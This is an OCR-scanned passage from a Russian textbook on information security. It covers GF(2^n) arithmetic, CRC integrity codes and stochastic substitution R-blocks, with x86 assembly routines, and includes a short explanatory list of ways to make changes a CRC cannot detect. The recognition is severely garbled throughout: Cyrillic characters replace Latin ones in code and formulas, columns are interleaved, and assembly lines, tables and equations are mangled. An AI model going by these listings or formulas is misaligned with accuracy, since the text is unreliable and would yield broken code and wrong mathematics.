от ситуация всегда имеет место, когда ф(х) — неприводимый, но не примитивный много- 

т 





член. Определим структуру устройства (генератора элементов поля), позволяющего со- 


поставить каждому ненулевому элементу поля соответствующую степень примитивного 
элемента. 
Пусть 


Рис. 2.4.2. Соответствие между различными формами представления элементов поля СЕ“) 


р=2,п=4, = +х+1 Имеем 


х+1=(+ 1+ (+ 1+ (+ 12+ +1 = 
— неприводимый над СЕ(2). ФЕ =Е+И то ++ ++ И 


. (+ 1+0 + +х+ 1) + + 1+(2+1) + 15+ 1=$(х) 
На рис. 2.4.3 показано устройство, соответствующее характеристическому многочле- 


.2.4.2 по $(х) - примитивный многочлен, а значит, соответствие между различными формами 
ну @(х) =х +тх +х тх+ 1. 


представления элементов СЁ(2“) можно получить, моделируя работу устройства, пока- 
занного на рис. 2.4.4. Один такт работы этого устройства суть умножение на в =х + ]. 
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Рис. 2.4.4. Генератор элементов поля СЕ2“) 


2.4.3. Сложение и умножение в поле СЕ (2”) 


Элементами поля СЁ(2”) являются двоичные многочлены степени меньшей и, кот 
могут быть заданы строкой своих коэффициентов, т. ©. в виде п-разрядных двоичных, 

Сложение в поле СЁ(2”) — это обычная операция сложения многочленов © ис м 
ванием операции ХОЕК при приведении подобных членов; или операция поразр 


вую-- 
ХОБ, если элементы поля представлены в виде строки коэффициентов соответст ую 


емн 
многочленов. Например, в поле СЁ (2*), элементами которого являются двоичны 
члены, степень которых меньше восьми, байту 


01010111 (57? в шестнадцатеричной форме) 
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Гла 


соответствует многочлен № 
с 


хи +х+ 1. 


Пример выполнения сложения в поле СЕ(*): 
‘57? + ‘83? = ‘Р4?, 
как 
тк . Ач +++ = +++? 
ИЛИ 
01010111 + 10000011 = 11010100. 


В конечном поле для любого ненулевого элемента и существует обратный аддитив. 
ный элемент —@, при этом а + (-0) = 0. В СК?”) справедливо а + а = 0, т. е. каждый нену. 
левой элемент является своей собственной аддитивной инверсией. 

В конечном поле для любого ненулевого элемента а существует обратный мультип. 
ликативный элемент © ', при этом аа: ' = 1. Умножение в поле СЁЕ(2”) — это обычная опе. 
рация умножения многочленов со взятием результата по модулю некоторого неприводи. 
мого двоичного многочлена ф(х) я-й степени и с использованием операции ХО при 
приведении подобных членов. Умножение в СЕ(2”) также можно выполнять, рассматри. 
вая ненулевые элементы поля как степени некоторого примитивного элемента ©. 

Программная реализация операции умножения двух элементов © и В поля СЁ(2") може 
быть выполнена двумя способами: табличным и вычислением результата оВ "на лету". 

Если элементы поля © и В представлены в виде степени примитивного элемента, т. е. 

| а=фиВ=оу, 
то их произведение оВ может быть вычислено по формуле 
ов _ (ово. 


Именно этот факт используется при реализации умножения табличным способом. Форми. 
руются два массива Е/ет и Аа. Первый массив состоит из 2” — | ненулевых элементов поля 
(-разрядных двоичных кодов), расположенных в порядке возрастания степеней примитивно. 
го элемента. Например, содержимое ячейки массива Еет с адресом 0 равно = 1, т.е. 


Еет [0] = вх; 
‘Элержимое ячейки массива Е/ет с адресом 1 равно = ©, т.е. 
Ейет [1] = & ит.д. 
т.е содержимое ячейки массива Е/ет с адресом { равно ©), 
Еет [1 = 6; где {= 0, 2" -2. 
Вто 


В каж рой массив формируется для ускорения поиска нужного элемента в массиве Ейеп, 


ДОЙ ячей . . 
Чет, ячейке массива А" с адресом /] содержится адрес элемента поля / в массив 
"У/=Ъ 2” |, т.е. 
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нии ааа нате аж, и 


Нет/Й = а <> Ада] =Ьае СЕ”), а = 0. 
Процедура определения результата оВ умножения двух элементов поля 
= иВ= 6 
с использованием массивом Е/ет и 94 основана на нахождении в массиве Е1ет элемент. 
а и считывании результата умножения из ячейки массива Еет, циклически смещенно 
в сторону старших адресов относительно ячейки, содержащей о, на] Позиций, Т. ©. 
аВ = Еет [(Ё+]) тоа 2" 1] = Еет [(Ааа|о] + Ааа"В]) тоа2” — 1]. 


Рассмотрим поле СР (2“), порожденное многочленом ФС) = х+х+1. На рис. 24: 
показан пример умножения двух элементов поля о = 1011 иВ = 0100: 
1011. 0100 = 1010. 
На рис. 2.4.6 показан пример умножения двух элементов поля © = 1101 иВ = 1000: 
1101. 1000 = 0010. 


Программная реализация табличного умножения двух ненулевых элементов поз 


СЕ”) приведена ниже. 








№1921 - процедура умножения двух 
ненулевых элементов поля 6Е(2°}. == 





При вызове: 05: ВХ - адрес массива Е1епёАаЕ (рис. 
АН - первый сомножитель а = , ЕЕЕ=ЕЕЕЕЕЕЕЕЕЕЕЕЕЕНЕЕЕ: 
} заааееЕы == 


АБ. - второй сомножитель В =о’, ======== 


х}аё ; формируем в АБ адрес элемента В 

; в массиве Е1ещ, АБ = ) 

ЗАН=) , А =а 

х1а® ; формируем в АБ адрес элемента а 
; в массиве Р1ет, АЪ = 1 


а9а а}, ай ; формирование адреса 


Эпс Вез11% ; ячейки массива Вет, 
зар а1, 255 ; содержащей результат умножения ов 
Вези1: ааа Ьх, 256 ; 03: ВХ - адрес массива Р1ем 
х}аё ; считывание в АЬ 
; результата умножения ов 
рор рх 
тес 


Мо19Е1 ЕКОР 
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Рис. 2.4.5. Пример умножения двух элементов поля СЕ(24) 
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} 


Массив 
Еет8&АЧаг / 


п ч 
[1| 4447'01 
[2] го? | 
[3 [ 404703 
И 
ПИ 
53| лаг | 
54] Ааатте 
158] Ав | 
|1 | Массив Еет - нен 

- ненулевые 
|1] 


05:[ВХ] 








Массив АД! - адреса Ада} 
ненулевых элементов поля 
в массиве ет 










0$:[8%+256] 1 
о элементы поля в порядке 
возрастания степени 
примитивного элемента поля 6 


| -о 
ое 
вр 
о 
р 
ПЕЛИ 
Г 
28] 5 | 


г 


ре о 


АЧАГ 6! 


[3 





= 
1 = 
ы 


ис. 2.4.7. Организация массива Нет Аааг 


Еет[255] 


Пусть, например, для построения поля СЕ(2*) выбран 
Ф(х) = ++ +х+1 


— неприводимый многочлен показателя 51. Диаграмма состояний соответствующег. 


устройства (рис. 2.4.8, а), один такт работы которого суть умножение на х по Мс. 
Ф(х), имеет 5 кодовых колец по 5] состоянию в каждом и один вырожденный три! 
ный ЦИКЛ, соответствующий состоянию ‘00’, 
структуру устройства (генератора элементов поля), позволяющего сопоставить ках 
ненулевому элементу поля соответствующую степень примитивного элемента. 


переходящему самому в себя. Опре, * 








= 
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ря ааа а ра рии оао бора и вали оон ина пи о правваевасооииоае 151 
а 
98994 Н 2 
14% %9% ех 
б0000б001 01 
бобобоботт 03 
{00000101 05 | 
{0ббо001т1тт1т 
оботооот 11 
оботтоотт зз 
01010101 55 
ооботтоОто А 
бо1тоОтт1то 2 
0 
11100т0 72 
оо 
0 г] 
бооо0о 00 
в 


р 
ЧС. 2.4.8. Поле СЕ2%): 


а -БАбю соо 
6 ‚ соответствующий характеристическ 

у ратор элементов СЕ(23); р ому многочлену {бд = х8 + № +3 +х+1; 
Эчаграмма его состояний 


`еене 
в 
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Имеем пер: пб ав, а1 } копия "старого" 
` ; состояния г 
И +++ Е тя 
= (+1) + (++ (+ +х+ 0 ++ +т= ; бита обратной связи 
+ жэ+х+1= (>), с МехЕ ; если бит обратной связи равен 
= ° ; нулю, к 
Ф(><) — примитивный многочлен, а значит, соответствие между различными форман, ии результата, 
представления элементов СЕО») можно получить, моделируя работу устройства, по, хох а!, ; действие единичного бита обратной связи 
занного на рис. 2.4.8, 6: Хехе: т ри ав ; АЬ - "новое" состояние генератора 
[®) , 
00000001 — 01 (о [О р Г сх на О лодую 
да! ' щего 
001 - 03" (©) ; такта работы генератора 
00000101 -'05' (©) поу ах, 400% 
00001111 -'0Е' (6) 10 218 
0001000 1 — '11' (65°) Е в тв, ; Вектор обратных связей 
бО11001 1 -'33' (6) Е е91т 
Пи Пора дер ножен своим ок 
ТА (хх + +х+ а +х+Р= 
, 00011010-—'1А' (®) ВИ Я 6 А 
00101110-'2Е' (@°) хо ии +1 = 
=(х +х’ + 1) тоаФ() 
.‹е ИЛИ 
11110111 -"Е7 (65) 608.80 = о”, 
00000010- '02' (6) азначит, 
00000110-'06 (&”°) 14°" 
.=. ВСЕ2*) справедливо 
1тоООт11- "СТ (©) 67-1, 
01010010-'52' (65°) азначит, ненулевые элементы фи от; 
11110110-—Е6' (625%). фо та гла ты &’ и ©/(1 /) являются взаимно обратными тогда и только 
работу данного устройства молелируст программе, призденная ниже | [+255 
Генератор элементов поля 6Ё(2), когда ф(х) не является == ; 





примитивным. Один такт работы устройства суть умножение 1 . 0-02! = 07255 
;==== нах + 1 по модулю $(х). у - 6. 










; Программа предназначена для запуска в отладчике = ЛИ 11.3В4'=1 
; в пошаговом режиме. АГ - состояние генератора. == 
де аесеесиеникеенененанЕЕЕнЕНЕЕНЕНЕЕЕНЕЕЕЕЕНННЕЕЕЕЕЕНЯЯ2Я И р . , 
' : ха +х+х +х^)= 
‚ МОРЕЬ пу | , ( Х. х?) = 1. 
‚ СОРЕ Множая произвольный многочлен 
ОВС 100% и й р . 
Вед1п: поу а1, 018 $ АБ = '01' нах по а(х) = ах’ + абхб + ах? + ах + аз + а +ах + а 
поу сх, 255 ; Число циклов равно количеству лУчим в об 


щем случае многочлен 8-й степени 
; ненулевых элементов поля 








ош ЕЁ&> ии 
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154 


„карооваввон ия вии и но вии вии еороеев а 
чеонев, 


< 




















ах + ах” + ах + ах + азх* + ах + ах? + аох. поу сх, 8 ; Число повторений цикла 
Если а7 = 0, мы сразу получаем результат умножения; если а = 1, необходимо взят, кот р, 5 вания регистра, 
результат по модулю Ф(х), что в рассматриваемой ситуации, очевидно, эквивалентн, уехебВ ЕЕ: , Вт ав, 1 ; Анализ ом порыирустся резутьтат 
вычитанию из результата $(х). Таким образом, умножение а(х) на х на байтовом уров | , ; сомножителя первого 
| это либо результат циклического сдвига в сторону старших разрядов байта тс хТ1ще Если выдвигаемый бит равен нулю 
(алавазазазаза: ао), хог Ы, а, нь следующему циклу © 
| если а = 0; либо поразрядный ХОК результата циклического сдвига байта а ; проме  Урочното ыы 
| (азавазаазаза1 ао) ии ое (а), АБ = а я==ннеенянее= результата 
в сторону старших разрядов с вектором обратной связи '1В’ (см. рис. 2.4.8, а), если те дс ри 
| отт о 
| Пусть ла: 1оор еде ра пе === 
хТте(а) пу а1, ©} ; Результат умножения в АЬ | 
— операция умножения элемента поля @ на х. Тогда умножение на х" можно осуществиь | пезше: гее Рор сх 5х 
путем и-кратного повторения операции хГте(а). ио19Е2 МОР 
Например, 
57’ '13'= ЕЕ’, 
так как 2.4.4. | 
Вычисление обратного элемента в поле СЕ” 


57102" = хите(57) = 'АЕ’ 
57104" = хите(АЕ) = '47' 
5708" = хНте(4Т) = '8Е' 
557.10’ = хнте(8Е) = 07" 
57-13" = '57(01Ф02110 = '57'®'АЕ®'07'= ТВ” ‚м 
" произведения двух элементов СЕ? —— 


Как и в случ 
ае умножения элем 
ентов поля 
имеет два способа решения. Ниже ‚ залача нахожд 
ПОЛЯ СЕ(28) на "лету". 


ения обратного э 
лемента 
и 
приведен пример вычисления обратного элемента 





`- П 
‚7 Роцедура формирования обратного элемента в 6Р(28), === 
, —— 


Ниже приведен пример вычисления "на лету | 
ГОО ВОР ОО ООО ОИ 


приведенному выше алгоритму. 


8 4 3 
х + 
р Хх 1х +х +1 - неприводимый =====е=енененье 
: - элемент п : пы 
а оля а, выход: АБ - элемент поля а“! == 
ектор обратных связей, 
для заданного ф(х) ЕВ = 181 













== При вызове: АН - первый сомножитель, 









; О - вектор обратных связей генератора элементов поля. = Ует51 оп ВОС 
; При возврате: Аш - результат умножения. 
; ееееенкнеЕнЕнЕЕЕЕЕЕНЕНЕЕНЕНЫНННННННЯННН+== РизВ сх 
М1 92 РВОС Хог ‚ 
9 сезе а\, а1 ; Первый сомножитель равен 0 ? т сх, сх ; Обнуляем счетчик 
32 Вези1 ; Если да, на выход - результат равен 0 и: са! 1 
хспа ап, а! | . Мос 
р сезе а], а! ; Второй сомножитель равен 0? пс сх 
| 32 Вези1* ; Если да, на выход - результат равен 0 стр .а1, 018 
312 Мехе1 


разн рх сх 
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| а ним зинивонннннв иен ава овевазьнинне линии нации нниченине 
| о: ан миа | А 
3 оор №хе2 
рор сх и = М=8 
` теё п 100011011 (51) 
Тпмегз1оп ЕМОР | / и (3) 100011101 (255) 
ее аенаеинеиннекяиненннеенняенннян=н====== : - 100101011 (255) 
Один такт работы генератора элементов поля === ===== и (7) р т 
вос 10011 (15) 101001101 т 
ризВ Ьх 11111 (5) 101011111 (255) 
поУ Ь], а! ; Сохраняем исходное значение => 101100011 (255) 
; элемента поля а 100101 (31) 101110111 (85 
$81 а1, 1 они сп 101111011 (85) 
ле №ежбЗ и 1) | 110000111 (255) 
хог а1, ЕВ 000011 (63) 110001011 (85) 
Мехс3: ; Получили результат умножения я 1001001 (9) . 110011111 (51) 
. ; нах отт (21) 111001111 (255) 
хог а1, Ь1 ; Получили результат умножения а 1011011 (63) 111010111 (17) 
; нах +1 1100111 (63} 
рор рх . №М=7 
ге 10000011 (127) 
ЕВ = 1ВВ 10001001 (127) 
Мое ЕКО 10001111 (127) 
нии 10011101 (127) 
' 10100111 (127) 
В заключение приведем список многочленов, неприводимых над СЕС), № <9. М 010101011 (127) 
гочлены заданы набором их коэффициентов ам ам-1...а»..2 @1 @6, например, набор 1 10111111 (127) 
соответствует многочлену х +х + 1. В скобках указан показатель многочлена, т. © 1. 11001011 (127) 
меньшее положительное число е, при котором х’—1 делится на данный многочлен - 11101111 (127) 


— Ма . 
остатка. Многочлены 1 (х), для которых справедливо соотношение / (х)=хДх ), где 
_ многочлен степени М, уже имеющийся в списке, не приводятся. 
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/ 


2.5.1. Контроль целостности информации 
с использованием СЁС-кодов 






















































Идеальным средством защиты информации от случайных искажений являются © 1 и , . . 
коды (сусЙс гедипаапсу со4е). Достоинствами САС-кодов являются: , 1 б 1 о 
Ш высокая достоверность обнаружения искажений, доля Ро обнаруживаемых искаже д\0 5 _\, : д 1 д о ($ 
не зависит от длины массива данных, а определяется только разрядностью М ко. 1 о 0 7 
трольного кода: . 1 1 1 
Ро=1-2* б 0 0 0 1 
Ш зависимость контрольного кода не только от всех бит анализируемой информа. : , , , , , 
ной последовательности, но и от их взаимного расположения; . 1 5 и о 
Ш высокое быстродействие, связанное с получением контрольного кода в реа, , ГИ пи т 
ООН { 


масштабе времени; 
@ простота аппаратной реализации и удобство интегрального исполнения; 
и простота программной реализации. 


К сожалению, простое условие пропуска искажений делает САС-коды принципиалью 
не пригодными для защиты от умышленных искажений информации. По этой же прич 
не следует признать непригодным использование процедуры формирования СКС-коз 
для хеширования информации. 

Сущность процесса контроля целостности с использованием САС-кодов заключаету 
в следующем. Генератор САС-кода инициализируется фиксированным начальным значени Ро 
ем. Чаще всего в качестве начального заполнения используется либо код "все 0", либо ко: 1 
"все 1". Учитывая, что от начального состояния генератора достоверность метода не зави й 
сит, все дальнейшие рассуждения выполняются в предположении, что исходное состояни 0 
устройства — нулевое. Анализируемая двоичная последовательность преобразуется в кор 0 
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кий (обычно шестнадцати- или тридцатидвухразрядный) двоичный код — САС-код. Зна%® 
ние полученного САС-кода сравнивается с эталонным значением, полученным заранее 1 
последовательности без искажений. По результатам сравнения делается вывод о налич! 
или отсутствии искажений в анализируемой последовательности. 
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РИН ЗИОИС Ил . 
Жи жье+х Жж+х+1 
бе ничи . Ж+Ж +1 
ючи+жЖ+х У 
+Ж+х } 
Ж + +х 
+ж + 
э+х 





ко 
Рис. 2.5.1. Три варианта схемы генератора С®С-кода, соответствующего: 
а, 6, в — характеристическому многочлену фо = ж+х+1; 
г — деление многочлена входной последовательности на характери 
генератора СКС-кода. 
К — коэффициенты многочлена-остатка К}, 
О — коэффициенты многочлена-частного 6} 





стический многочлен 


а, показанную на рис. 2.5.1, 6. Входной анал! 





Рассмотрим схему генератора САС-код 
зируемой двоичной последовательности 
А=ааа,...а,...а,—»› а, Е {0,1},2=0,(т-1) 
ожно поставить в соответствие многочлен А 





где т — длина последовательности, м © 


ни (т-1) 

















А(х) = ах" + ...+ ах" + ах + ат-1. 


Тогда процесс получения СВС-кода эквивалентен делению многочлена АС 
последовательности на характеристический многочлен Ф(х) генератора СКС-кода. 


А(%) = $606) + ©), 










) вхо 
си 
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и А(х) — 
т С я р соответственно частное и остаток, то коэффициенты 
ходе ) мно 
ПОЯВ й пора после п де разряда Чм-ь а коэффициенты многочлена Вх) ос гочлена 
генератора ти рохождения всей последовательности А. Ин аются в регис 
ности равен коду остатка К, т.е. 5 = К, а5(х) = (х) . Иначе говоря, СЮС- 
Работа генератора СКС-кода описывается системой линейных уравнений 
ний 
Чо (1+1) = 9,4, .(1) Фа, 
(Е = име 
4; ( +1) С у.,Ч-1(1)Ф 4, (,=,М-Ь 
ес о ... О Е {0 _ 
ле сы ‚- № 4 Е {0, 1}, — коэффициенты образующего многочлена, 40) и 4+1) 
ние }-го разряда, соответственно, в моменты времени 1 и/+ 1, {=0, т р м. сост 
Таким образом, для СЮС- НИТИ. 
ит реакция линей с генератора справедлив принцип суперпози .. 
:р ейного устройства на сумму двух входных воздей ции, который г. 
ейств 


реакций на каждое воздействие в отдельности 
Пусть . 


КОД5ВТ 


ий равна сум 


А= аа... ат 
_ анализируемая последовательность, 
 _авильная . В= Боб... Би 
- последо 
не последо вательность (без искажений), е — последовательность получ 
тат ложе одулю два соответствующих элементов пос ое 
‚т.е. ого элемента последовательности е справедлив оРИтельност 
о 
е, =а, ФВ, 1 =0, (т-1). 


Единичны 
те биты п. 
оследовательности е соответствуют искаженным битам п 
оследог 


з С. д 2 
тельнос ТИ В ПОЭТ ому последовате] НОСТИ е ЛОГ ично назвать последовательностью И. 
вектором, ошибок. При отсу ТСТВИИ искажений 


91 =0,(т-П,ё=0. 


Пусть А(х), В 
‚ Все) и _ , 
вательностей А (®) и е(х) — многочлены; 54, зв и 5, — СС- 


Й 


Вие. Ис коды, соответственно, п 
, кажения в последовательности А будут пропущены Г, ослед 
› если 54 =: 


меем 4 = В Ф 
е, откуда 
‚› откуда, применяя принцип суперпозиции, получаем равенств 
о 
Таким 5д = 55 ® 5. 
образом, нео 
"СЯ равенство р ‚ : бходимым и достаточным условием пропуска иска я 
МНогоц е -9, которое имеет место, когда экений явл 
лен ф(х). › когда многочлен е(х) нацело делится | 
Се сказ 
анное относ 
и ДВУХ других, так о генератора, показанного на рис. 2.5.1, 6; справедл 
= ы для всех трех гене и И 
тогда и т раторов при е * 0 сп 
олько т раведливо ут 
т одинаковую до огда, когда е(х) нацело делится на ф(х). Все три ем ны 
ТТетьей достоверность контроля, тем не менее предпочтени в осо 
. ©е следует отда: 


э Н Н мешивани ош 
ИЗ Н печивающей наибо. тее интенсив ое переме е иоо 
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алина новини чан нанив пни нин нина пении нии инете пааниие линии ааанни иен ииниинненньть и ЗУМ 
Рассмотрим процесс получения СКС-кода последовательности ошибок е. Каждый ‚ 
ничный бит этой последовательности, поступив на вход первых двух СВС-генераторо, 
искажает состояние только одного, первого, разряда регистра. В третьем генератор 
в котором САС-код последовательности А равен остатку от деления многочлена х^4 ,) 
на $(х), в аналогичной ситуации искажаются сразу и» разрядов, где и — количество („. 
водов обратной связи. 


В общем случае схемы СЁС-генераторов имеют вид, показанный на рис. 2.5.2. 


Реефаск 





Входная двоичная 
последовательность А 


Ееефаск 





Входная двоичная 
последовательность А 





Ееефаск ГГ 
чар, 


ЕЕЗ Е? 
Схема Галуа 


Рис. 2.5.2. Варцанты схемы одноканального СКС-генератора: 
а — на основе генератора Фибоначчи; 
б, в — на основе генератора Галуа 








Входная двоичная 
последовательность А 


СВС-генератор, обеспечивающий получение контрольного кода, равного остат" 
от деления многочлена х'°А(х) на многочлен 


ФС) В+! + +1, 
где А(х) — многочлен входной последовательности 
а, Е {0,1}, = 0, (т-1), 


А=ааа,...а,...а 


т-12 


показан на рис. 2.5.3. 
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СВС-код 


р 
К. 2.5.3. Обработка двух слов в СКС-генераторе, соответствующем образующему многочлену 
Фо = х6 + 2 + 9 + х7 + 1 и характеристическому многочлену ф(о = х16 + + 2+ +1 


2.5,3. Многоканальные СЁС-генераторы 


б Процедуру формирования СКС-кода многоразрядной последовательности, наприм‹ 


ОвоЙ, можно реализовать двумя способами: либо преобразованием каждого бай’ 


пос 
Ледовательности в последовательный код с последующей обработкой каждого би 


б* 
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в одноканальном СЁС-генераторе (рис. 2.5.4), либо побайтовой обработкой в Ск 
генераторе, реализованном на основе восьмиразрядного генератора Фибоначчи (р 
2.5.5). В тех случаях когда разрядность используемого для получения СЕС-кода [Е 
больше требуемой разрядности контрольного кода, последний снимается с младших 

рядов СЕС-генератора. Например, для СЁС-генератора, показанного на рис. 2.5.5, 

разрядный контрольный код необходимо снимать с выходов 


915914 --. 9+... 929190. 







Одноканальный 
(ВС-генератор 


Преобразователь параллельного 
кода в последовательный 






Входная многоразрядная 
последовательность А 





Рис. 2.5.4. Многоканальный СКС-генератор 





Рис. 2.5.5. Восьмиканальный СКС-генератор, реализованный по схеме Фибоначчи. 
ФО = х° +7 +1 





последовательности слов (содержимого буфера ВуЁ). === 













При вызове: 05 - сегментный адрес буфера, = 
$1 - относительный адрес буфера, СХ - размер буфера, === 
АХ - начальное состояние СВС-генератора, ОХ - вектор обратной 


связи; при возврате: АХ - СВС-код заданного массива слов. ==== 








о 
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ГАЗа 2. елеиенинннсснльнниеннениниииинкяиченикоииии тии тени 


оу 91, 16 ; Число повторений внутреннего цикла 
; Начало внешнего цикла обработки очередного слова, 
; число повторений равно числу слов в обрабатываемом массиве 


хехзМота: разп ах 
1045 ; Чтение буфера 
разп ах 
рор рх ; Очередное слово в ВХ 
рор ах `; Текущее значение СВАС-кода 
рузП сх ; Сохраняем параметр внешнего цикла 
оу сх, 91 ; Число повторений внутреннего цикла 
; Начало внутреннего цикла обработки очередного бита слова 
МехеВ: 
51: ах, 1 
пс 2егоРВ1 
хог ах, 9х ; Выдвигаемый бит равен 1, поэтому 
; инвертируем биты САС-генератора - 
; приемники сигнала обратной связи 
2етоЕВ1: 
$51 рх, 1 
Эпс 2егоРВ2 
хог ах, Чх ; Обрабатываемый бит слова равен 1, 
; Поэтому инвертируем биты СВАС-генератора - 
; приемники сигнала обратной связи 
2етоРВ2: 
Тоор Мех(В1Е ; Конец внутреннего цикла 
рор сх ; Восстанавливаем параметр внешнего цикла 
]оор МехЕМога; Конец внешнего цикла 
рор 91 рх 
геЕ 
сгс16 ЕМОР 


2.5.44. Способы обмана СЁЮС-кода 


в заключение сформулируем способы "обмана" САС-кода, т. е. способы внесения не- 
о уживаемых искажений информации. Пусть задан массив данных А. САС-код 54 
аженного массива А’ будет равен СКС-коду 5 массива А в следующих случаях: 


Пи я 
скаженный массив получается путем добавления к исходному массиву А информа- 
Ционной последовательности, имеющей нулевой СКС-код; . 


2) и 
с .. 
каженный массив получается путем исключения из исходного массива А информа- 
Ционной последовательности, имеющей нулевой СКС-код; 


3) 

ис ь. 

и каженный массив получается путем замены фрагмента исходного массива А 
а другой, имеющий такое же значение САС -кода; 
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изозоони мае он ов иирнаниние низ оа ионы ии иини ие она цововнь 


4) искаженный массив получается путем инвертирования битов исходного массив 
таким образом, чтобы соответствующий многочлен ошибок е(х) делился наг 5 
на характеристический многочлен ф(х) генератора САС-кода. 


при записи в каждую ячейку массивов Н и Аа4р ее собственного адреса получае 
я 

классический сумматор по модулю 2", а значит, с полным на то основанием А-бло 

может быть назван стохастическим сумматором; 

в по такому же принципу (заменой сумматора по модулю 256 на операцию поразрядн: 


2.6. Стохастическое преобразование информации го ХОЮ) может быть построен стохастический сумматор в поле ОЕ(2“) (стохасти 


ческий ХОВ), а возможно и другие элементы (АМО, ОК, тоа р ит. п.}; 
. п.); 
в заслуживает дополнительного исследования схема стохастического преобразования 


2.6.1. КВ-блок показанная на рис. 2.6.3, где функция К — сумматор по модулю 2% или поразрядны, 
. ХОЕ (а возможно и другие операции АМО, ОК, тоа р ит. п.) 
Эффективным средством защиты информации от случайных и умышленных деструк. ” 
тивных воздействий является стохастическое преобразование информации. Схема 












Вспомогательный Основной 
одного из возможных вариантов построения К-блока стохастического преобразования массив (адресный)  нассив 
и его условное графическое обозначение показаны соответственно на рис. 2.6.1 и 2.6.2. Адрес Ааа Ад н 

ес 
Ключевая информация А-блока — заполнение таблицы б й 
—_ —__ п 
Н ={Н(т)}, т=0, (2" 1) де : 
об ----------- 2 
п > м 
размерности их 2”, содержащей элементы СЕО”), перемешанные случайным образом, т. с. 3 3 
Н(п) Е СЕ”). Результат Кн(А,В) преобразования входного и-разрядного двоичного набора 4 й 
А зависит от заполнения таблицы Н и параметра преобразования В, задающего смещение 5 5 
в таблице относительно ячейки, содержащей значение 4, следующим образом 6 6 
Вн(А, В) = Н((тл + В) тоа 2"), 7 7 
где тл — адрес ячейки таблицы Н, содержащей код А, т. е. Нид) = А. Другими словами 8 8 
9 
9 


результат работы А-блока суть считывание содержимого ячейки таблицы Н, циклически 
смещенной на В позиций в сторону старших адресов относительно ячейки, содержащей 
код А. Для ускорения преобразования в состав В-блока вводится вспомогательный 
адресный массив 


рн н-е- 
отно 


даа = {Ааа} 


+. 
мл 





размерности их 2", причем 
У7=О0, (2” -—1) Ааа"(})=т, 


Иными словами ячейка с адресом / в массиве А44г хранит адрес ячейки масс 
содержащей код /. Заслуживают внимания следующие факты: 

Ш при Аа! = {0, 1,2, ... (2"- 1}, т. е. при записи в каждую ячейку массива Ада" ее собе 
венного адреса и и = 4 результат преобразования в точности совпадает с результата" 
работы двух тактов (сложение с 4 битами ключа и замена в соответствующем уз 
замены) одной секции раундовой функции российского стандарта криптографиче 
защиты ГОСТ 28147-89; 

№ в частном случае при 444 = {0, 1,2, ..., (2" - 1} иВ = 0 получаем классический ^ 
блок (блок замены) с таблицей замен Н; 





ож 


Рис. 2.6.1. Логика работы К-блока 
ива Ё 
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А В, (А, В) 


В 


Рис. 2.6.2. Условное графическое обозначение К—блока 


Рис. 2.6.3. Вариант схемы блока стохастического преобразования (®Е-блок) 


1 Н 
Ключевая информация, необходимая для работы К-блока, — содержимое м 
стохастического преобразования. Алгоритм замены ключевой информации, т. ее 
шивания" или "взбивания" таблиц Н, показан на рис. 2.6.4. Каждая очередная пар 
ВУТЕь ВУТЕнл 

элемента 

й местами два соответствующих 

ей последовательности меняет 

инициализирующ ° 
массива Н, т. е. выполняется операци | 


Е(ВУТЕ) < Н(ВУТЕ„ 4), {= 0, 2, 4, ... 


На > : о миро" 
где Н()) - элемент массива Н, расположенный в ячейке с адресом /. Алгоритм фор 
вания вспомогательного массива А44/ показан на рис. 2.6.5. 


РР 
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Рис. 2.6.4. Схема алгоритма “перемешивания" 
таблицы стохастического преобразования 

с использованием инициализирующей ПСП 
ВУТЕс, ВУТЕт, ВУТЕ», ..., ВУТЕ,, ВУТЕзчл, 


Рис. 2.6.5. Схема алгоритма формирования 
адресного массива Ад! по известному 
массиву Н 





При вызове: АБ - входной байт, АН - параметр преобразования, = 
05 - серментный адрес массива АЧЯГ&Н, = 
ВХ - относительный адрес массива. АЧт&Н (рис. 2.6.6), 

СХ - размерность массивов АЗаг и Н (Н517е}. = 








х1ае ; Чтение из таблицы Адаг 

а99 а1, ай ; АГ - адрес выходного байта в массиве Н 
ада Ьх, сх ; ВХ - относительный адрес массива Н 
х1ае ; Чтение из таблицы Н 

рор рх 

тее 


ЗВох 





ООО 
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нина ии И Ооо вов нпнен и паев омовееань энние 1 7 


дааг&Н 


| 


НИИ 


ЕН 


Рис. 2.6.6. Массив АЧОг&Н 


; Запись байта 5(01} 
; в ячейку таблицы с адресом 02 









1оор МехЕРеги 
; Восстановление содержимого регистров 
рор 91 ах 


Айдаг 











05: [ВХ+Н$12е] 











; При вызове: таблица Н стохастического преобразования, === 
0$ - сегментный адрес массива АЗаг&Н, == 
= ВХ - относительный адрес массива АЧаг&нН, 








;==== НРети1 - перемешивание таблицы замен 5-блока или таблицы = 


При возврате: готовый к использованию массив Адат&Н. 





АаагТпт РВОС 
; Сохранение содержимого используемых регистров 





ризВ ах $1 91 
; Инициализация 
; хог а1, а1 
НРеги1  РВОС оу 81, сх 
; Сохранение содержимого используемых регистров ; Цикл записи в массив АЗаг 
разВЕ Мех ИгАЧат : 
ри5В ах 91 оу 91, МОВО РТВ [Хх + 31] 
; Инициализация . ; Чтение байта 
с19 апа 91, ОРЕЛ ; из массива Н 
хог ан, ай поУ ВУТЕ РТК [Ьх + 91], а! 
; Цикл перемешивания _ | ; Запись байта в массив Аг 
МехкРегп: 1рс а1 ‚ } Подготовка к 
1043 ; Чтение нечетного байта ключевой 1пс $1 ; следующему циклу 
; последовательности АЬ = 01 1оор М№хСИгАЧах 
‚ поУ 91, аа ; = 01 ; Восстановление содержимого регистров 
х1ае ; Чтение байта из ячейки таблицы рор 91 $1 ах 
; с адресом 01, А = $(01} И те 
ризВ ах ; $(01} --> стек Е} ЕМОР 
10985 х Чтение четного байта ключевой ЕН Можно п 
; последовательности АБ = 02 в ческого редложить еще один возможный алгоритм формирования таблицы стохасти: 
рузй ах ; 02 --> стек Г? преобразования, его схема приведена на рис. 2.6.7 
хТаё ; Чтение байта из ячейки таблицы г. * 


; с адресом 92, АЬ = $ (02) 

по ВУТЕ РТВ [Ьх + 91], а] 
; Запись байта $(02) в ячейку таблицы 
; с адресом 01 

рор 91 Я = 92 

рор. ах АБ = 5(91) 

| поу ВУТЕ РТВ [х + 91], а1 











о их 
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ВУТЕ, ВУТЕ , ... ‚ ВУТЕ, 


Запись байта ВУТЕ, в ячейку 
таблицы Н с адресом ] 
НО} = ВУТЕ, 


Чтение байта ВУТЕ, 


Поиск ВУТЕ, в заполненных 
ячейках таблицы Н 


Байт ВУТЕ, в таблице 
Н есть? 


Рис. 2.6.7. Схема алгоритма формирования таблицы стохастического преобразования 
с использованием инициализирующей ПСП ВУТЕо, ВУТЕ1, ВУТЕ>, ..., ВУТЕ, 


